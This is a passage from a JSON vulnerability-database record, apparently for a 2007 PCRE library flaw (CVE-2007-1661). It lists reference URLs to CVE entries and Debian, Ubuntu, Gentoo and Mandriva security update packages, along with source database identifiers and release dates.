          {
            "trust": 0.2,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-4767"
          },
          {
            "trust": 0.2,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-1659"
          },
          {
            "trust": 0.2,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2006-7230"
          },
          {
            "trust": 0.2,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2006-7227"
          },
          {
            "trust": 0.2,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-4766"
          },
          {
            "trust": 0.2,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-4768"
          },
          {
            "trust": 0.2,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2006-7228"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/pcre3/libpcre3-dev_6.7+7.4-2_mipsel.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/pcre3/libpcrecpp0_6.7+7.4-2_alpha.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/pcre3/pcregrep_4.5+7.4-1_hppa.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/pcre3/pcregrep_4.5+7.4-1_arm.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/pcre3/libpcre3_4.5+7.4-1_m68k.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/pcre3/libpcre3-dev_4.5+7.4-1_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/pcre3/pcre3_6.7+7.4.orig.tar.gz"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/pcre3/pgrep_4.5+7.4-1_all.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/pcre3/libpcre3_4.5+7.4-1_hppa.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/pcre3/libpcre3_4.5+7.4-1_ia64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/pcre3/pcregrep_4.5+7.4-1_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/pcre3/libpcre3_6.7+7.4-2_hppa.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/pcre3/libpcre3-dev_6.7+7.4-2_mips.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/pcre3/pcregrep_4.5+7.4-1_ia64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/pcre3/libpcrecpp0_6.7+7.4-2_hppa.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/pcre3/libpcrecpp0_6.7+7.4-2_ia64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/pcre3/libpcrecpp0_6.7+7.4-2_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/pcre3/libpcre3-dev_6.7+7.4-2_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/pcre3/libpcre3_4.5+7.4-1_s390.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/pcre3/libpcre3-dev_6.7+7.4-2_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/pcre3/libpcre3_6.7+7.4-2_mips.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/pcre3/pcregrep_6.7+7.4-2_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/pcre3/libpcre3_6.7+7.4-2_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/pcre3/libpcre3_6.7+7.4-2_arm.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/pcre3/libpcre3-dev_4.5+7.4-1_mipsel.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/pcre3/pcregrep_4.5+7.4-1_mipsel.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/pcre3/libpcre3-dev_6.7+7.4-2_hppa.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/pcre3/libpcre3_4.5+7.4-1_alpha.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/pcre3/libpcre3-dev_4.5+7.4-1_ia64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/pcre3/libpcre3-dev_4.5+7.4-1_mips.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/pcre3/pcregrep_4.5+7.4-1_alpha.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/pcre3/pcre3_4.5+7.4-1.dsc"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/pcre3/libpcre3_4.5+7.4-1_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/pcre3/pcre3_6.7+7.4-2.diff.gz"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/pcre3/libpcre3_6.7+7.4-2_ia64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/pcre3/libpcre3_6.7+7.4-2_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/pcre3/libpcre3_6.7+7.4-2_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/pcre3/libpcre3-dev_6.7+7.4-2_arm.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/pcre3/pcregrep_6.7+7.4-2_ia64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/pcre3/libpcre3-dev_6.7+7.4-2_ia64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/pcre3/libpcre3_4.5+7.4-1_mips.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/pcre3/libpcre3_6.7+7.4-2_s390.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/pcre3/libpcrecpp0_6.7+7.4-2_mipsel.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/pcre3/pcregrep_6.7+7.4-2_arm.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/pcre3/pcre3_4.5+7.4.orig.tar.gz"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/pcre3/pcregrep_4.5+7.4-1_mips.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/pcre3/libpcrecpp0_6.7+7.4-2_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/pcre3/libpcre3-dev_4.5+7.4-1_arm.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/pcre3/libpcrecpp0_6.7+7.4-2_s390.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/pcre3/pcregrep_4.5+7.4-1_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/pcre3/pcregrep_6.7+7.4-2_alpha.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/pcre3/pcre3_6.7+7.4-2.dsc"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/pcre3/libpcre3_4.5+7.4-1_arm.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/pcre3/libpcre3_6.7+7.4-2_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/pcre3/libpcre3_4.5+7.4-1_mipsel.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/pcre3/libpcrecpp0_6.7+7.4-2_arm.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/pcre3/libpcre3-dev_4.5+7.4-1_hppa.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/pcre3/libpcre3_4.5+7.4-1_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/pcre3/libpcrecpp0_6.7+7.4-2_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/pcre3/libpcre3-dev_6.7+7.4-2_alpha.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/pcre3/libpcre3_6.7+7.4-2_alpha.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/pcre3/pcregrep_6.7+7.4-2_s390.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/pcre3/pcre3_4.5+7.4-1.diff.gz"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/pcre3/pcregrep_6.7+7.4-2_mips.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/pcre3/libpcre3-dev_4.5+7.4-1_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/pcre3/libpcre3-dev_4.5+7.4-1_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/pcre3/pcregrep_6.7+7.4-2_hppa.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/pcre3/libpcrecpp0_6.7+7.4-2_mips.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/pcre3/libpcre3-dev_6.7+7.4-2_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/pcre3/libpcre3_4.5+7.4-1_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/pcre3/libpcre3-dev_6.7+7.4-2_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/pcre3/pcregrep_6.7+7.4-2_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/pcre3/pcregrep_6.7+7.4-2_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/pcre3/pcregrep_4.5+7.4-1_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/pcre3/pcregrep_6.7+7.4-2_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/pcre3/pcregrep_4.5+7.4-1_s390.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/pcre3/libpcrecpp0_6.7+7.4-2_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/pcre3/libpcre3-dev_6.7+7.4-2_s390.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/pcre3/libpcre3-dev_4.5+7.4-1_m68k.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/pcre3/libpcre3-dev_4.5+7.4-1_alpha.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/pcre3/libpcre3_6.7+7.4-2_mipsel.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/pcre3/pcregrep_6.7+7.4-2_mipsel.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/pcre3/pcregrep_4.5+7.4-1_m68k.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/pcre3/libpcre3-dev_4.5+7.4-1_s390.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/universe/p/pcre3/pcregrep_7.4-0ubuntu0.6.06.1_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/universe/p/pcre3/pcregrep_7.4-0ubuntu0.6.10.1_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/pcre3/libpcrecpp0_7.4-0ubuntu0.7.10.1_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/universe/p/pcre3/pcregrep_7.4-0ubuntu0.7.10.1_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/pcre3/libpcre3-dev_7.4-0ubuntu0.7.10.1_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/pcre3/pcre3_7.4-0ubuntu0.6.06.1.dsc"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/pcre3/pcre3_7.4-0ubuntu0.7.04.1.dsc"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/pcre3/libpcre3-dev_7.4-0ubuntu0.6.10.1_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/universe/p/pcre3/pcregrep_7.4-0ubuntu0.7.10.1_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/pcre3/libpcrecpp0_7.4-0ubuntu0.6.10.1_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/pcre3/libpcre3_7.4-0ubuntu0.7.10.1_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/pcre3/libpcre3-dev_7.4-0ubuntu0.7.04.1_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/universe/p/pcre3/pgrep_7.4-0ubuntu0.6.06.1_all.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/pcre3/libpcre3-dev_7.4-0ubuntu0.6.06.1_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/universe/p/pcre3/pcregrep_7.4-0ubuntu0.7.10.1_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/pcre3/libpcre3_7.4-0ubuntu0.6.10.1_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/pcre3/libpcrecpp0_7.4-0ubuntu0.6.06.1_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/pcre3/libpcre3-dev_7.4-0ubuntu0.6.10.1_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/pcre3/libpcre3-dev_7.4-0ubuntu0.6.06.1_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/pcre3/pcre3_7.4-0ubuntu0.6.06.1.diff.gz"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/pcre3/libpcre3_7.4-0ubuntu0.6.06.1_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/pcre3/libpcre3_7.4-0ubuntu0.6.06.1_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/pcre3/libpcrecpp0_7.4-0ubuntu0.7.04.1_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/pcre3/libpcre3_7.4-0ubuntu0.6.06.1_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/pcre3/pcre3_7.4.orig.tar.gz"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/pcre3/pcre3_7.4-0ubuntu0.7.10.1.dsc"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/pcre3/pcre3_7.4-0ubuntu0.7.04.1.diff.gz"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/universe/p/pcre3/pcregrep_7.4-0ubuntu0.6.10.1_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/universe/p/pcre3/pcregrep_7.4-0ubuntu0.7.04.1_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/universe/p/pcre3/pcregrep_7.4-0ubuntu0.6.06.1_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/pcre3/pcre3_7.4-0ubuntu0.7.10.1.diff.gz"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/pcre3/libpcre3-dev_7.4-0ubuntu0.7.10.1_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/pcre3/libpcre3_7.4-0ubuntu0.7.10.1_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/universe/p/pcre3/pcregrep_7.4-0ubuntu0.7.04.1_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/pcre3/libpcre3_7.4-0ubuntu0.7.10.1_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/pcre3/libpcre3-dev_7.4-0ubuntu0.6.10.1_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/pcre3/libpcrecpp0_7.4-0ubuntu0.6.06.1_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/pcre3/libpcrecpp0_7.4-0ubuntu0.6.06.1_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/pcre3/libpcrecpp0_7.4-0ubuntu0.7.10.1_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/universe/p/pcre3/pcregrep_7.4-0ubuntu0.6.10.1_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/universe/p/pcre3/pcregrep_7.4-0ubuntu0.6.06.1_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/pcre3/pcre3_7.4-0ubuntu0.6.10.1.diff.gz"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/universe/p/pcre3/pcregrep_7.4-0ubuntu0.6.06.1_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/pcre3/libpcre3-dev_7.4-0ubuntu0.6.06.1_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/pcre3/libpcre3_7.4-0ubuntu0.6.10.1_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/pcre3/libpcre3-dev_7.4-0ubuntu0.7.10.1_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/pcre3/libpcre3-dev_7.4-0ubuntu0.7.10.1_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/universe/p/pcre3/pcregrep_7.4-0ubuntu0.7.04.1_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/pcre3/libpcrecpp0_7.4-0ubuntu0.7.04.1_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/universe/p/pcre3/pcregrep_7.4-0ubuntu0.6.10.1_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/pcre3/libpcre3_7.4-0ubuntu0.7.04.1_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/pcre3/libpcre3-dev_7.4-0ubuntu0.7.04.1_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/universe/p/pcre3/pcregrep_7.4-0ubuntu0.7.10.1_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/pcre3/libpcre3_7.4-0ubuntu0.7.04.1_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/pcre3/libpcre3-dev_7.4-0ubuntu0.6.10.1_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/pcre3/libpcre3_7.4-0ubuntu0.7.10.1_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/pcre3/libpcrecpp0_7.4-0ubuntu0.6.06.1_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/pcre3/libpcrecpp0_7.4-0ubuntu0.6.10.1_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/pcre3/libpcrecpp0_7.4-0ubuntu0.7.04.1_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/universe/p/pcre3/pcregrep_7.4-0ubuntu0.7.04.1_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/pcre3/libpcre3-dev_7.4-0ubuntu0.6.06.1_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/pcre3/pcre3_7.4-0ubuntu0.6.10.1.dsc"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/pcre3/libpcrecpp0_7.4-0ubuntu0.6.10.1_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/pcre3/libpcre3-dev_7.4-0ubuntu0.7.04.1_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/pcre3/libpcre3_7.4-0ubuntu0.7.04.1_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/pcre3/libpcrecpp0_7.4-0ubuntu0.7.10.1_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/pcre3/libpcre3_7.4-0ubuntu0.6.10.1_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/pcre3/libpcre3-dev_7.4-0ubuntu0.7.04.1_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/pcre3/libpcrecpp0_7.4-0ubuntu0.7.10.1_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/pcre3/libpcre3_7.4-0ubuntu0.7.04.1_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/pcre3/libpcrecpp0_7.4-0ubuntu0.7.04.1_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/pcre3/libpcre3_7.4-0ubuntu0.6.10.1_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/pcre3/libpcre3_7.4-0ubuntu0.6.06.1_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/pcre3/libpcrecpp0_7.4-0ubuntu0.6.10.1_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-7228"
          },
          {
            "trust": 0.1,
            "url": "http://bugs.gentoo.org."
          },
          {
            "trust": 0.1,
            "url": "http://enigmail.mozdev.org"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-7230"
          },
          {
            "trust": 0.1,
            "url": "http://creativecommons.org/licenses/by-sa/2.5"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-7227"
          },
          {
            "trust": 0.1,
            "url": "http://security.gentoo.org/"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/k/kazehakase/kazehakase_0.4.2-1etch1.dsc"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/k/kazehakase/kazehakase_0.4.2-1etch1_mips.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/k/kazehakase/kazehakase_0.4.2-1etch1_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/k/kazehakase/kazehakase_0.4.2-1etch1.diff.gz"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/k/kazehakase/kazehakase_0.4.2-1etch1_mipsel.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/k/kazehakase/kazehakase_0.4.2.orig.tar.gz"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/k/kazehakase/kazehakase_0.4.2-1etch1_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/k/kazehakase/kazehakase_0.4.2-1etch1_alpha.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/k/kazehakase/kazehakase_0.4.2-1etch1_hppa.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/k/kazehakase/kazehakase_0.4.2-1etch1_arm.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/k/kazehakase/kazehakase_0.4.2-1etch1_s390.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/k/kazehakase/kazehakase_0.4.2-1etch1_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/k/kazehakase/kazehakase_0.4.2-1etch1_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://www.mandriva.com/security/"
          },
          {
            "trust": 0.1,
            "url": "http://www.mandriva.com/security/advisories"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-25023"
          },
          {
            "db": "BID",
            "id": "26346"
          },
          {
            "db": "PACKETSTORM",
            "id": "60696"
          },
          {
            "db": "PACKETSTORM",
            "id": "61268"
          },
          {
            "db": "PACKETSTORM",
            "id": "61164"
          },
          {
            "db": "PACKETSTORM",
            "id": "66037"
          },
          {
            "db": "PACKETSTORM",
            "id": "60800"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200711-106"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2007-001064"
          },
          {
            "db": "NVD",
            "id": "CVE-2007-1661"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "VULHUB",
            "id": "VHN-25023"
          },
          {
            "db": "BID",
            "id": "26346"
          },
          {
            "db": "PACKETSTORM",
            "id": "60696"
          },
          {
            "db": "PACKETSTORM",
            "id": "61268"
          },
          {
            "db": "PACKETSTORM",
            "id": "61164"
          },
          {
            "db": "PACKETSTORM",
            "id": "66037"
          },
          {
            "db": "PACKETSTORM",
            "id": "60800"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200711-106"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2007-001064"
          },
          {
            "db": "NVD",
            "id": "CVE-2007-1661"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2007-11-07T00:00:00",
            "db": "VULHUB",
            "id": "VHN-25023"
          },
          {
            "date": "2007-11-05T00:00:00",
            "db": "BID",
            "id": "26346"
          },
          {
            "date": "2007-11-06T06:49:14",
            "db": "PACKETSTORM",
            "id": "60696"
          },
          {
            "date": "2007-11-27T04:00:48",
            "db": "PACKETSTORM",
            "id": "61268"
          },
          {
            "date": "2007-11-26T22:40:19",
            "db": "PACKETSTORM",
            "id": "61164"
          },
